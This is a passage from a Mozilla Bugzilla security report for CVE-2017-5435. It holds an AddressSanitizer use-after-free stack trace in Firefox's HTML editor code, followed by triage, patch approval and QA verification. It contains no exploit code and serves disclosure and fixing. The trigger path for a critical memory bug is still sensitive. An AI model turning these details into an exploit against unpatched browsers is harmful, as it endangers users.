    #4 0x7f278dddfac1 in EndEditorInit /home/worker/workspace/build/src/editor/libeditor/TextEditor.cpp:221:3
    #5 0x7f278dddfac1 in mozilla::AutoEditInitRulesTrigger::~AutoEditInitRulesTrigger() /home/worker/workspace/build/src/editor/libeditor/TextEditUtils.cpp:109
    #6 0x7f278dd3ce59 in mozilla::HTMLEditor::Init(nsIDOMDocument*, nsIContent*, nsISelectionController*, unsigned int, nsAString const&) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:316:3
    #7 0x7f278de39b24 in nsEditingSession::SetupEditorOnWindow(mozIDOMWindowProxy*) /home/worker/workspace/build/src/editor/composer/nsEditingSession.cpp:454:16
    #8 0x7f278de368c0 in nsEditingSession::MakeWindowEditable(mozIDOMWindowProxy*, char const*, bool, bool, bool) /home/worker/workspace/build/src/editor/composer/nsEditingSession.cpp:173:10
    #9 0x7f278c5e67d0 in nsHTMLDocument::EditingStateChanged() /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2843:25
    #10 0x7f278c5faded in SetDesignMode /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2956:10
    #11 0x7f278c5faded in nsHTMLDocument::SetDesignMode(nsAString const&, nsIPrincipal&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2939
    #12 0x7f278bb573d7 in mozilla::dom::HTMLDocumentBinding::set_designMode(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:757:9
    #13 0x7f278bdf29dc in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2921:8
    #14 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #15 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #16 0x7f27915c5b69 in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #17 0x7f27915c5b69 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518
    #18 0x7f27915c5b69 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:647
    #19 0x7f2792458f1a in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2473:10
    #20 0x7f2792458f1a in js::NativeSetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::QualifiedBool, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2508
    #21 0x7f279217bbda in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1460:12
    #22 0x7f279217bbda in js::SetPropertyIgnoringNamedGetter(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::PropertyDescriptor>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/BaseProxyHandler.cpp:182
    #23 0x7f278bdfde54 in mozilla::dom::DOMProxyHandler::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) const /home/worker/workspace/build/src/dom/bindings/DOMJSProxyHandler.cpp:258:10
    #24 0x7f27921acef1 in js::Proxy::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:369:21
    #25 0x7f279209d19d in JSObject::nonNativeSetProperty(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/jsobj.cpp:1049:12
    #26 0x7f27915a599c in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1459:16
    #27 0x7f27915a599c in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:243
    #28 0x7f27915a599c in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2789
    #29 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #30 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #31 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #32 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #33 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #34 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #35 0x7f27921b17e7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #36 0x7f27915c41a3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #37 0x7f27915c41a3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #38 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #39 0x7f2791f4142b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #40 0x7f278b895c95 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/xpcom/ds/nsDeque.cpp:260:7 in nsDeque::Pop()
Shadow bytes around the buggy address:
  0x0c2880020530: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c2880020540: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2880020550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2880020560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2880020570: 00 00 00 00 00 00 00 00 00 00 03 fa fa fa fa fa
=>0x0c2880020580: fa fa fa fa fa fa fa fa fd fd fd fd[fd]fd fd fd
  0x0c2880020590: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c28800205a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c28800205b0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c28800205c0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c28800205d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12221==ABORTING
Do you have time to look at this, Masayuki?
Flags: needinfo?(masayuki)
Keywords: csectype-uaf, sec-critical
Hmm, my queue is already full...
Flags: needinfo?(masayuki)
(Assignee)

Comment 3

2 years ago
Based on stack trace, this is effectively a missing kungfuDeathGrip
Assignee: nobody → bugs
(Assignee)

Comment 4

2 years ago
Posted patch patchSplinter Review
This should help.
I went through also other cases when mTxnMgr is used in a similar way.
Attachment #8852031 - Flags: review?(masayuki)
Group: core-security → dom-core-security
(Assignee)

Comment 5

2 years ago
Comment on attachment 8852031 [details] [diff] [review]
patch

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
Not very easily

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Commit message could be rather vague
"Bug 1350683, ensure the transaction processing, r=masayuki"
The patch itself tells quite well what the issue is.

Which older supported branches are affected by this flaw?
All. Old code

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
the patch seems to apply to beta too

How likely is this patch to cause regressions; how much testing does it need?
Should be safe
Attachment #8852031 - Flags: sec-approval?
Attachment #8852031 - Flags: approval-mozilla-beta?
Attachment #8852031 - Flags: approval-mozilla-aurora?
Marking affected versions and giving sec-approval+ for trunk and the two main branches. We'll want ESR52 and ESR45 patches made and nominated as well.
status-firefox52: --- → wontfix
status-firefox53: --- → affected
status-firefox54: --- → affected
status-firefox-esr45: --- → affected
status-firefox-esr52: --- → affected
tracking-firefox53: --- → +
tracking-firefox54: --- → +
tracking-firefox55: --- → +
tracking-firefox-esr45: --- → 53+
tracking-firefox-esr52: --- → 53+
Attachment #8852031 - Flags: sec-approval?
Attachment #8852031 - Flags: sec-approval+
Attachment #8852031 - Flags: approval-mozilla-beta?
Attachment #8852031 - Flags: approval-mozilla-beta+
Attachment #8852031 - Flags: approval-mozilla-aurora?
Attachment #8852031 - Flags: approval-mozilla-aurora+
Comment on attachment 8852031 [details] [diff] [review]
patch

This grafts cleanly to esr52 and requires a tiny rebase for esr45 (s/rv/res in one spot).
Attachment #8852031 - Flags: approval-mozilla-esr52?
Attachment #8852031 - Flags: approval-mozilla-esr45?
Comment on attachment 8852031 [details] [diff] [review]
patch

prevent use after free, esr45+, esr52+
Attachment #8852031 - Flags: approval-mozilla-esr52?
Attachment #8852031 - Flags: approval-mozilla-esr52+
Attachment #8852031 - Flags: approval-mozilla-esr45?
Attachment #8852031 - Flags: approval-mozilla-esr45+
https://hg.mozilla.org/mozilla-central/rev/5e91448f4b30
Status: NEW → RESOLVED
Last Resolved: 2 years ago
status-firefox55: affected → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla55
Group: dom-core-security → core-security-release
Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+]
Alias: CVE-2017-5435
Flagging this for manual testing, testcase in Comment 0.
Flags: qe-verify+
Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+] → [adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage]
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
I managed to reproduce the issue on Firefox 55.0a1(Build ID 20170326225108) asan Debug build, under Ubuntu 16.04x64.

The crash is no longer reproducible on Firefox 55.0a1(2017-04-13) ASAN build, Firefox 54.0a2(2017-04-13) ASAN build, 53.0b12 ASAN build, 53.0 ASAN build, Firefox 52.1.0 ESR ASAN build, 55.0a1(2017-04-17) build, Firefox 54.0a2(2017-04-17), Firefox 53.0 or on Firefox 52.1.0 ESR.
Tests were performed under Ubuntu 16.04x64.

Note that on Firefox 45.9.0 ESR ASAN and Firefox 45.9.0 ESR builds the tests were performed without installing install domfuzz_helper-2012.07.07-fx+fn+an.xpi, since it's not compatible with these two builds.
Status: RESOLVED → VERIFIED
status-firefox53: fixed → verified
status-firefox54: fixed → verified
status-firefox55: fixed → verified
status-firefox-esr45: fixed → verified
status-firefox-esr52: fixed → verified
Flags: qe-verify+
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.